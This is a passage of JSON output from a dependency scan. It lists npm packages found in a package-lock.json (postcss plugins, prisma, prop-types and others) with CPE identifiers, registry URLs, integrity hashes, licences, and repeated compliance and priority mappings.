"cpe:2.3:a:postcss-load-config:postcss-load-config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-load-config:postcss_load_config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_load_config:postcss-load-config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_load_config:postcss_load_config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-load:postcss-load-config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-load:postcss_load_config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_load:postcss-load-config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_load:postcss_load_config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss-load-config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss_load_config:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/postcss-load-config@6.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-6.0.1.tgz", "integrity": "sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g==", "dependencies": { "lilconfig": "^3.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a302d705f049e265", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: postcss-nested 6.2.0", "title": "postcss-nested 6.2.0", "description": "Package discovered: postcss-nested 6.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "16f11e75cb882477", "name": "postcss-nested", "version": "6.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:postcss-nested:postcss-nested:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-nested:postcss_nested:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_nested:postcss-nested:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_nested:postcss_nested:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss-nested:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss_nested:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/postcss-nested@6.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/postcss-nested/-/postcss-nested-6.2.0.tgz", "integrity": "sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ==", "dependencies": { "postcss-selector-parser": "^6.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "002cf57b0b0dcab6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: postcss-selector-parser 6.1.2", "title": "postcss-selector-parser 6.1.2", "description": "Package discovered: postcss-selector-parser 6.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f7f4c134629f3b3a", "name": "postcss-selector-parser", "version": "6.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:postcss-selector-parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-selector-parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_selector_parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_selector_parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/postcss-selector-parser@6.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.1.2.tgz", "integrity": "sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg==", "dependencies": { "cssesc": "^3.0.0", "util-deprecate": "^1.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "738a4e319226bde2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: postcss-value-parser 4.2.0", "title": "postcss-value-parser 4.2.0", "description": "Package discovered: postcss-value-parser 4.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d70570520f43a33c", "name": "postcss-value-parser", "version": "4.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:postcss-value-parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-value-parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_value_parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_value_parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/postcss-value-parser@4.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz", "integrity": "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f330341278522955", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: prisma 5.22.0", "title": "prisma 5.22.0", "description": "Package discovered: prisma 5.22.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f76e4353403c9c3d", "name": "prisma", "version": "5.22.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:prisma:prisma:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/prisma@5.22.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/prisma/-/prisma-5.22.0.tgz", "integrity": "sha512-vtpjW3XuYCSnMsNVBjLMNkTj6OZbudcPPTPYHqX0CJfpcdWciI1dM8uHETwmDxxiqEwCIE6WvXucWUetJgfu/A==", "dependencies": { "@prisma/engines": "5.22.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9fc67df1307075e9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: process-nextick-args 2.0.1", "title": "process-nextick-args 2.0.1", "description": "Package discovered: process-nextick-args 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "da765da41b164754", "name": "process-nextick-args", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:process-nextick-args:process-nextick-args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process-nextick-args:process_nextick_args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process_nextick_args:process-nextick-args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process_nextick_args:process_nextick_args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process-nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process-nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process_nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process_nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process:process-nextick-args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:process:process_nextick_args:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/process-nextick-args@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b351d49072943449", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: prop-types 15.8.1", "title": "prop-types 15.8.1", "description": "Package discovered: prop-types 15.8.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2485766b0114da33", "name": "prop-types", "version": "15.8.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:prop-types:prop-types:15.8.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:prop-types:prop_types:15.8.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:prop_types:prop-types:15.8.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:prop_types:prop_types:15.8.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:prop:prop-types:15.8.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:prop:prop_types:15.8.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/prop-types@15.8.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz", "integrity": "sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg==", "dependencies": { "loose-envify": "^1.4.0", "object-assign": "^4.1.1", "react-is": "^16.13.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "acadb8b8517c78d3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: proto-list 1.2.4", "title": "proto-list 1.2.4", "description": "Package discovered: proto-list 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "685c0e3e50c6553a", "name": "proto-list", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:proto-list:proto-list:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto-list:proto_list:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto_list:proto-list:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto_list:proto_list:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto:proto-list:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto:proto_list:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/proto-list@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz", "integrity": "sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "44c7a82b0c4aafcf", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: proto3-json-serializer 2.0.2", "title": "proto3-json-serializer 2.0.2", "description": "Package discovered: proto3-json-serializer 2.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5add12638aea166c", "name": "proto3-json-serializer", "version": "2.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:proto3-json-serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto3-json-serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto3_json_serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 